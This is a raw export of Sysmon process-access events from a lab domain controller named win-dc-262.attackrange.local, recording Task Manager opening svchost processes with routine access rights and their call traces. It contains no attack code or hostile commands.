10341000x8000000000000000204888Microsoft-Windows-Sysmon/Operationalwin-dc-262.attackrange.local-2021-02-03 21:34:49.790{29E67E80-16F9-601B-3D38-00000000A301}44006212C:\Windows\system32\taskmgr.exe{29E67E80-7CBF-6019-1700-00000000A301}1628C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\taskmgr.exe+b3bc|C:\Windows\system32\taskmgr.exe+b1cf|C:\Windows\system32\taskmgr.exe+1a084|C:\Windows\system32\taskmgr.exe+19e20|C:\Windows\system32\taskmgr.exe+1cc42|C:\Windows\system32\taskmgr.exe+14fa9|C:\Windows\system32\taskmgr.exe+2cdd3|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000204887Microsoft-Windows-Sysmon/Operationalwin-dc-262.attackrange.local-2021-02-03 21:34:49.790{29E67E80-16F9-601B-3D38-00000000A301}44006212C:\Windows\system32\taskmgr.exe{29E67E80-7CBF-6019-1700-00000000A301}1628C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\taskmgr.exe+b3bc|C:\Windows\system32\taskmgr.exe+b2b8|C:\Windows\system32\taskmgr.exe+19d0d|C:\Windows\system32\taskmgr.exe+1cc42|C:\Windows\system32\taskmgr.exe+14fa9|C:\Windows\system32\taskmgr.exe+2cdd3|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000204886Microsoft-Windows-Sysmon/Operationalwin-dc-262.attackrange.local-2021-02-03 21:34:49.790{29E67E80-16F9-601B-3D38-00000000A301}44006212C:\Windows\system32\taskmgr.exe{29E67E80-7CBF-6019-1600-00000000A301}1528C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\taskmgr.exe+b3bc|C:\Windows\system32\taskmgr.exe+19544|C:\Windows\system32\taskmgr.exe+1a290|C:\Windows\system32\taskmgr.exe+19e20|C:\Windows\system32\taskmgr.exe+1cc42|C:\Windows\system32\taskmgr.exe+14fa9|C:\Windows\system32\taskmgr.exe+2cdd3|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000204885Microsoft-Windows-Sysmon/Operationalwin-dc-262.attackrange.local-2021-02-03 21:34:49.790{29E67E80-16F9-601B-3D38-00000000A301}44006212C:\Windows\system32\taskmgr.exe{29E67E80-7CBF-6019-1600-00000000A301}1528C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\taskmgr.exe+b3bc|C:\Windows\system32\taskmgr.exe+1ea6a|C:\Windows\system32\taskmgr.exe+1a0d0|C:\Windows\system32\taskmgr.exe+19e20|C:\Windows\system32\taskmgr.exe+1cc42|C:\Windows\system32\taskmgr.exe+14fa9|C:\Windows\system32\taskmgr.exe+2cdd3|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000204884Microsoft-Windows-Sysmon/Operationalwin-dc-262.attackrange.local-2021-02-03 21:34:49.790{29E67E80-16F9-601B-3D38-00000000A301}44006212C:\Windows\system32\taskmgr.exe{29E67E80-7CBF-6019-1600-00000000A301}1528C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\taskmgr.exe+b3bc|C:\Windows\system32\taskmgr.exe+b1cf|C:\Windows\system32\taskmgr.exe+1a084|C:\Windows\system32\taskmgr.exe+19e20|C:\Windows\system32\taskmgr.exe+1cc42|C:\Windows\system32\taskmgr.exe+14fa9|C:\Windows\system32\taskmgr.exe+2cdd3|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000204883Microsoft-Windows-Sysmon/Operationalwin-dc-262.attackrange.local-2021-02-03 21:34:49.790{29E67E80-16F9-601B-3D38-00000000A301}44006212C:\Windows\system32\taskmgr.exe{29E67E80-7CBF-6019-1600-00000000A301}1528C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\taskmgr.exe+b3bc|C:\Windows\system32\taskmgr.exe+b2b8|C:\Windows\system32\taskmgr.exe+19d0d|C:\Windows\system32\taskmgr.exe+1cc42|C:\Windows\system32\taskmgr.exe+14fa9|C:\Windows\system32\taskmgr.exe+2cdd3|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000204882Microsoft-Windows-Sysmon/Operationalwin-dc-262.attackrange.local-2021-02-03 21:34:49.790{29E67E80-16F9-601B-3D38-00000000A301}44006212C:\Windows\system32\taskmgr.exe{29E67E80-7CBF-6019-1500-00000000A301}1480C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\taskmgr.exe+b3bc|C:\Windows\system32\taskmgr.exe+19544|C:\Windows\system32\taskmgr.exe+1a290|C:\Windows\system32\taskmgr.exe+19e20|C:\Windows\system32\taskmgr.exe+1cc42|C:\Windows\system32\taskmgr.exe+14fa9|C:\Windows\system32\taskmgr.exe+2cdd3|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000204881Microsoft-Windows-Sysmon/Operationalwin-dc-262.attackrange.local-2021-02-03 21:34:49.790{29E67E80-16F9-601B-3D38-00000000A301}44006212C:\Windows\system32\taskmgr.exe{29E67E80-7CBF-6019-1500-00000000A301}1480C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\taskmgr.exe+b3bc|C:\Windows\system32\taskmgr.exe+1ea6a|C:\Windows\system32\taskmgr.exe+1a0d0|C:\Windows\system32\taskmgr.exe+19e20|C:\Windows\system32\taskmgr.exe+1cc42|C:\Windows\system32\taskmgr.exe+14fa9|C:\Windows\system32\taskmgr.exe+2cdd3|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000204880Microsoft-Windows-Sysmon/Operationalwin-dc-262.attackrange.local-2021-02-03 21:34:49.790{29E67E80-16F9-601B-3D38-00000000A301}44006212C:\Windows\system32\taskmgr.exe{29E67E80-7CBF-6019-1500-00000000A301}1480C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\taskmgr.exe+b3bc|C:\Windows\system32\taskmgr.exe+b1cf|C:\Windows\system32\taskmgr.exe+1a084|C:\Windows\system32\taskmgr.exe+19e20|C:\Windows\system32\taskmgr.exe+1cc42|C:\Windows\system32\taskmgr.exe+14fa9|C:\Windows\system32\taskmgr.exe+2cdd3|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000204879Microsoft-Windows-Sysmon/Operationalwin-dc-262.attackrange.local-2021-02-03 21:34:49.790{29E67E80-16F9-601B-3D38-00000000A301}44006212C:\Windows\system32\taskmgr.exe{29E67E80-7CBF-6019-1500-00000000A301}1480C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\taskmgr.exe+b3bc|C:\Windows\system32\taskmgr.exe+b2b8|C:\Windows\system32\taskmgr.exe+19d0d|C:\Windows\system32\taskmgr.exe+1cc42|C:\Windows\system32\taskmgr.exe+14fa9|C:\Windows\system32\taskmgr.exe+2cdd3|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000204878Microsoft-Windows-Sysmon/Operationalwin-dc-262.attackrange.local-2021-02-03 21:34:49.790{29E67E80-16F9-601B-3D38-00000000A301}44006212C:\Windows\system32\taskmgr.exe{29E67E80-7CBF-6019-1400-00000000A301}1252C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\taskmgr.exe+b3bc|C:\Windows\system32\taskmgr.exe+19544|C:\Windows\system32\taskmgr.exe+1a290|C:\Windows\system32\taskmgr.exe+19e20|C:\Windows\system32\taskmgr.exe+1cc42|C:\Windows\system32\taskmgr.exe+14fa9|C:\Windows\system32\taskmgr.exe+2cdd3|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000204877Microsoft-Windows-Sysmon/Operationalwin-dc-262.attackrange.local-2021-02-03 21:34:49.790{29E67E80-16F9-601B-3D38-00000000A301}44006212C:\Windows\system32\taskmgr.exe{29E67E80-7CBF-6019-1400-00000000A301}1252C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\taskmgr.exe+b3bc|C:\Windows\system32\taskmgr.exe+1ea6a|C:\Windows\system32\taskmgr.exe+1a0d0|C:\Windows\system32\taskmgr.exe+19e20|C:\Windows\system32\taskmgr.exe+1cc42|C:\Windows\system32\taskmgr.exe+14fa9|C:\Windows\system32\taskmgr.exe+2cdd3|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000204876Microsoft-Windows-Sysmon/Operationalwin-dc-262.attackrange.local-2021-02-03 21:34:49.790{29E67E80-16F9-601B-3D38-00000000A301}44006212C:\Windows\system32\taskmgr.exe{29E67E80-7CBF-6019-1400-00000000A301}1252C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\taskmgr.exe+b3bc|C:\Windows\system32\taskmgr.exe+b1cf|C:\Windows\system32\taskmgr.exe+1a084|C:\Windows\system32\taskmgr.exe+19e20|C:\Windows\system32\taskmgr.exe+1cc42|C:\Windows\system32\taskmgr.exe+14fa9|C:\Windows\system32\taskmgr.exe+2cdd3|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000204875Microsoft-Windows-Sysmon/Operationalwin-dc-262.attackrange.local-2021-02-03 21:34:49.789{29E67E80-16F9-601B-3D38-00000000A301}44006212C:\Windows\system32\taskmgr.exe{29E67E80-7CBF-6019-1400-00000000A301}1252C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\taskmgr.exe+b3bc|C:\Windows\system32\taskmgr.exe+b2b8|C:\Windows\system32\taskmgr.exe+19d0d|C:\Windows\system32\taskmgr.exe+1cc42|C:\Windows\system32\taskmgr.exe+14fa9|C:\Windows\system32\taskmgr.exe+2cdd3|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000204874Microsoft-Windows-Sysmon/Operationalwin-dc-262.attackrange.local-2021-02-03 21:34:49.789{29E67E80-16F9-601B-3D38-00000000A301}44006212C:\Windows\system32\taskmgr.exe{29E67E80-7CBF-6019-1300-00000000A301}1228C:\Windows\System32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\taskmgr.exe+b3bc|C:\Windows\system32\taskmgr.exe+19544|C:\Windows\system32\taskmgr.exe+1a290|C:\Windows\system32\taskmgr.exe+19e20|C:\Windows\system32\taskmgr.exe+1cc42|C:\Windows\system32\taskmgr.exe+14fa9|C:\Windows\system32\taskmgr.exe+2cdd3|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000204873Microsoft-Windows-Sysmon/Operationalwin-dc-262.attackrange.local-2021-02-03 21:34:49.789{29E67E80-16F9-601B-3D38-00000000A301}44006212C:\Windows\system32\taskmgr.exe{29E67E80-7CBF-6019-1300-00000000A301}1228C:\Windows\System32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\taskmgr.exe+b3bc|C:\Windows\system32\taskmgr.exe+1ea6a|C:\Windows\system32\taskmgr.exe+1a0d0|C:\Windows\system32\taskmgr.exe+19e20|C:\Windows\system32\taskmgr.exe+1cc42|C:\Windows\system32\taskmgr.exe+14fa9|C:\Windows\system32\taskmgr.exe+2cdd3|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000204872Microsoft-Windows-Sysmon/Operationalwin-dc-262.attackrange.local-2021-02-03 21:34:49.789{29E67E80-16F9-601B-3D38-00000000A301}44006212C:\Windows\system32\taskmgr.exe{29E67E80-7CBF-6019-1300-00000000A301}1228C:\Windows\System32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\taskmgr.exe+b3bc|C:\Windows\system32\taskmgr.exe+b1cf|C:\Windows\system32\taskmgr.exe+1a084|C:\Windows\system32\taskmgr.exe+19e20|C:\Windows\system32\taskmgr.exe+1cc42|C:\Windows\system32\taskmgr.exe+14fa9|C:\Windows\system32\taskmgr.exe+2cdd3|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000204871Microsoft-Windows-Sysmon/Operationalwin-dc-262.attackrange.local-2021-02-03 21:34:49.789{29E67E80-16F9-601B-3D38-00000000A301}44006212C:\Windows\system32\taskmgr.exe{29E67E80-7CBF-6019-1300-00000000A301}1228C:\Windows\System32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\taskmgr.exe+b3bc|C:\Windows\system32\taskmgr.exe+b2b8|C:\Windows\system32\taskmgr.exe+19d0d|C:\Windows\system32\taskmgr.exe+1cc42|C:\Windows\system32\taskmgr.exe+14fa9|C:\Windows\system32\taskmgr.exe+2cdd3|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000204870Microsoft-Windows-Sysmon/Operationalwin-dc-262.attackrange.local-2021-02-03 21:34:49.789{29E67E80-16F9-601B-3D38-00000000A301}44006212C:\Windows\system32\taskmgr.exe{29E67E80-7CBF-6019-1100-00000000A301}1172C:\Windows\System32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\taskmgr.exe+b3bc|C:\Windows\system32\taskmgr.exe+19544|C:\Windows\system32\taskmgr.exe+1a290|C:\Windows\system32\taskmgr.exe+19e20|C:\Windows\system32\taskmgr.exe+1cc42|C:\Windows\system32\taskmgr.exe+14fa9|C:\Windows\system32\taskmgr.exe+2cdd3|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000204869Microsoft-Windows-Sysmon/Operationalwin-dc-262.attackrange.local-2021-02-03 21:34:49.788{29E67E80-16F9-601B-3D38-00000000A301}44006212C:\Windows\system32\taskmgr.exe{29E67E80-7CBF-6019-1100-00000000A301}1172C:\Windows\System32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\taskmgr.exe+b3bc|C:\Windows\system32\taskmgr.exe+1ea6a|C:\Windows\system32\taskmgr.exe+1a0d0|C:\Windows\system32\taskmgr.exe+19e20|C:\Windows\system32\taskmgr.exe+1cc42|C:\Windows\system32\taskmgr.exe+14fa9|C:\Windows\system32\taskmgr.exe+2cdd3|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000204868Microsoft-Windows-Sysmon/Operationalwin-dc-262.attackrange.local-2021-02-03 21:34:49.788{29E67E80-16F9-601B-3D38-00000000A301}44006212C:\Windows\system32\taskmgr.exe{29E67E80-7CBF-6019-1100-00000000A301}1172C:\Windows\System32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\taskmgr.exe+b3bc|C:\Windows\system32\taskmgr.exe+b1cf|C:\Windows\system32\taskmgr.exe+1a084|C:\Windows\system32\taskmgr.exe+19e20|C:\Windows\system32\taskmgr.exe+1cc42|C:\Windows\system32\taskmgr.exe+14fa9|C:\Windows\system32\taskmgr.exe+2cdd3|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000204867Microsoft-Windows-Sysmon/Operationalwin-dc-262.attackrange.local-2021-02-03 21:34:49.788{29E67E80-16F9-601B-3D38-00000000A301}44006212C:\Windows\system32\taskmgr.exe{29E67E80-7CBF-6019-1100-00000000A301}1172C:\Windows\System32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\taskmgr.exe+b3bc|C:\Windows\system32\taskmgr.exe+b2b8|C:\Windows\system32\taskmgr.exe+19d0d|C:\Windows\system32\taskmgr.exe+1cc42|C:\Windows\system32\taskmgr.exe+14fa9|C:\Windows\system32\taskmgr.exe+2cdd3|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000204866Microsoft-Windows-Sysmon/Operationalwin-dc-262.attackrange.local-2021-02-03 21:34:49.788{29E67E80-16F9-601B-3D38-00000000A301}44006212C:\Windows\system32\taskmgr.exe{29E67E80-7CBF-6019-1000-00000000A301}1152C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\taskmgr.exe+b3bc|C:\Windows\system32\taskmgr.exe+19544|C:\Windows\system32\taskmgr.exe+1a290|C:\Windows\system32\taskmgr.exe+19e20|C:\Windows\system32\taskmgr.exe+1cc42|C:\Windows\system32\taskmgr.exe+14fa9|C:\Windows\system32\taskmgr.exe+2cdd3|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000204865Microsoft-Windows-Sysmon/Operationalwin-dc-262.attackrange.local-2021-02-03 21:34:49.788{29E67E80-16F9-601B-3D38-00000000A301}44006212C:\Windows\system32\taskmgr.exe{29E67E80-7CBF-6019-1000-00000000A301}1152C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\taskmgr.exe+b3bc|C:\Windows\system32\taskmgr.exe+1ea6a|C:\Windows\system32\taskmgr.exe+1a0d0|C:\Windows\system32\taskmgr.exe+19e20|C:\Windows\system32\taskmgr.exe+1cc42|C:\Windows\system32\taskmgr.exe+14fa9|C:\Windows\system32\taskmgr.exe+2cdd3|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000204864Microsoft-Windows-Sysmon/Operationalwin-dc-262.attackrange.local-2021-02-03 21:34:49.788{29E67E80-16F9-601B-3D38-00000000A301}44006212C:\Windows\system32\taskmgr.exe{29E67E80-7CBF-6019-1000-00000000A301}1152C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\taskmgr.exe+b3bc|C:\Windows\system32\taskmgr.exe+b1cf|C:\Windows\system32\taskmgr.exe+1a084|C:\Windows\system32\taskmgr.exe+19e20|C:\Windows\system32\taskmgr.exe+1cc42|C:\Windows\system32\taskmgr.exe+14fa9|C:\Windows\system32\taskmgr.exe+2cdd3|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000204863Microsoft-Windows-Sysmon/Operationalwin-dc-262.attackrange.local-2021-02-03 21:34:49.788{29E67E80-16F9-601B-3D38-00000000A301}44006212C:\Windows\system32\taskmgr.exe{29E67E80-7CBF-6019-1000-00000000A301}1152C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\taskmgr.exe+b3bc|C:\Windows\system32\taskmgr.exe+b2b8|C:\Windows\system32\taskmgr.exe+19d0d|C:\Windows\system32\taskmgr.exe+1cc42|C:\Windows\system32\taskmgr.exe+14fa9|C:\Windows\system32\taskmgr.exe+2cdd3|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000204862Microsoft-Windows-Sysmon/Operationalwin-dc-262.attackrange.local-2021-02-03 21:34:49.788{29E67E80-16F9-601B-3D38-00000000A301}44006212C:\Windows\system32\taskmgr.exe{29E67E80-7CBF-6019-0F00-00000000A301}1116C:\Windows\System32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\taskmgr.exe+b3bc|C:\Windows\system32\taskmgr.exe+19544|C:\Windows\system32\taskmgr.exe+1a290|C:\Windows\system32\taskmgr.exe+19e20|C:\Windows\system32\taskmgr.exe+1cc42|C:\Windows\system32\taskmgr.exe+14fa9|C:\Windows\system32\taskmgr.exe+2cdd3|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000204861Microsoft-Windows-Sysmon/Operationalwin-dc-262.attackrange.local-2021-02-03 21:34:49.787{29E67E80-16F9-601B-3D38-00000000A301}44006212C:\Windows\system32\taskmgr.exe{29E67E80-7CBF-6019-0F00-00000000A301}1116C:\Windows\System32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\taskmgr.exe+b3bc|C:\Windows\system32\taskmgr.exe+1ea6a|C:\Windows\system32\taskmgr.exe+1a0d0|C:\Windows\system32\taskmgr.exe+19e20|C:\Windows\system32\taskmgr.exe+1cc42|C:\Windows\system32\taskmgr.exe+14fa9|C:\Windows\system32\taskmgr.exe+2cdd3|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000204860Microsoft-Windows-Sysmon/Operationalwin-dc-262.attackrange.local-2021-02-03 21:34:49.787{29E67E80-16F9-601B-3D38-00000000A301}44006212C:\Windows\system32\taskmgr.exe{29E67E80-7CBF-6019-0F00-00000000A301}1116C:\Windows\System32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\taskmgr.exe+b3bc|C:\Windows\system32\taskmgr.exe+b1cf|C:\Windows\system32\taskmgr.exe+1a084|C:\Windows\system32\taskmgr.exe+19e20|C:\Windows\system32\taskmgr.exe+1cc42|C:\Windows\system32\taskmgr.exe+14fa9|C:\Windows\system32\taskmgr.exe+2cdd3|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000204859Microsoft-Windows-Sysmon/Operationalwin-dc-262.attackrange.local-2021-02-03 21:34:49.787{29E67E80-16F9-601B-3D38-00000000A301}44006212C:\Windows\system32\taskmgr.exe{29E67E80-7CBF-6019-0F00-00000000A301}1116C:\Windows\System32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\taskmgr.exe+b3bc|C:\Windows\system32\taskmgr.exe+b2b8|C:\Windows\system32\taskmgr.exe+19d0d|C:\Windows\system32\taskmgr.exe+1cc42|C:\Windows\system32\taskmgr.exe+14fa9|C:\Windows\system32\taskmgr.exe+2cdd3|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000204858Microsoft-Windows-Sysmon/Operationalwin-dc-262.attackrange.local-2021-02-03 21:34:49.787{29E67E80-16F9-601B-3D38-00000000A301}44006212C:\Windows\system32\taskmgr.exe{29E67E80-7CBF-6019-0D00-00000000A301}628C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\taskmgr.exe+b3bc|C:\Windows\system32\taskmgr.exe+19544|C:\Windows\system32\taskmgr.exe+1a290|C:\Windows\system32\taskmgr.exe+19e20|C:\Windows\system32\taskmgr.exe+1cc42|C:\Windows\system32\taskmgr.exe+14fa9|C:\Windows\system32\taskmgr.exe+2cdd3|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000204857Microsoft-Windows-Sysmon/Operationalwin-dc-262.attackrange.local-2021-02-03 21:34:49.787{29E67E80-16F9-601B-3D38-00000000A301}44006212C:\Windows\system32\taskmgr.exe{29E67E80-7CBF-6019-0D00-00000000A301}628C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\taskmgr.exe+b3bc|C:\Windows\system32\taskmgr.exe+1ea6a|C:\Windows\system32\taskmgr.exe+1a0d0|C:\Windows\system32\taskmgr.exe+19e20|C:\Windows\system32\taskmgr.exe+1cc42|C:\Windows\system32\taskmgr.exe+14fa9|C:\Windows\system32\taskmgr.exe+2cdd3|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000204856Microsoft-Windows-Sysmon/Operationalwin-dc-262.attackrange.local-2021-02-03 21:34:49.787{29E67E80-16F9-601B-3D38-00000000A301}44006212C:\Windows\system32\taskmgr.exe{29E67E80-7CBF-6019-0D00-00000000A301}628C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\taskmgr.exe+b3bc|C:\Windows\system32\taskmgr.exe+b1cf|C:\Windows\system32\taskmgr.exe+1a084|C:\Windows\system32\taskmgr.exe+19e20|C:\Windows\system32\taskmgr.exe+1cc42|C:\Windows\system32\taskmgr.exe+14fa9|C:\Windows\system32\taskmgr.exe+2cdd3|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000204855Microsoft-Windows-Sysmon/Operationalwin-dc-262.attackrange.local-2021-02-03 21:34:49.787{29E67E80-16F9-601B-3D38-00000000A301}44006212C:\Windows\system32\taskmgr.exe{29E67E80-7CBF-6019-0D00-00000000A301}628C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\taskmgr.exe+b3bc|C:\Windows\system32\taskmgr.exe+b2b8|C:\Windows\system32\taskmgr.exe+19d0d|C:\Windows\system32\taskmgr.exe+1cc42|C:\Windows\system32\taskmgr.exe+14fa9|C:\Windows\system32\taskmgr.exe+2cdd3|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000204854Microsoft-Windows-Sysmon/Operationalwin-dc-262.attackrange.local-2021-02-03 21:34:49.787{29E67E80-16F9-601B-3D38-00000000A301}44006212C:\Windows\system32\taskmgr.exe{29E67E80-7CBF-6019-0C00-00000000A301}588C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\taskmgr.exe+b3bc|C:\Windows\system32\taskmgr.exe+19544|C:\Windows\system32\taskmgr.exe+1a290|C:\Windows\system32\taskmgr.exe+19e20|C:\Windows\system32\taskmgr.exe+1cc42|C:\Windows\system32\taskmgr.exe+14fa9|C:\Windows\system32\taskmgr.exe+2cdd3|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000204853Microsoft-Windows-Sysmon/Operationalwin-dc-262.attackrange.local-2021-02-03 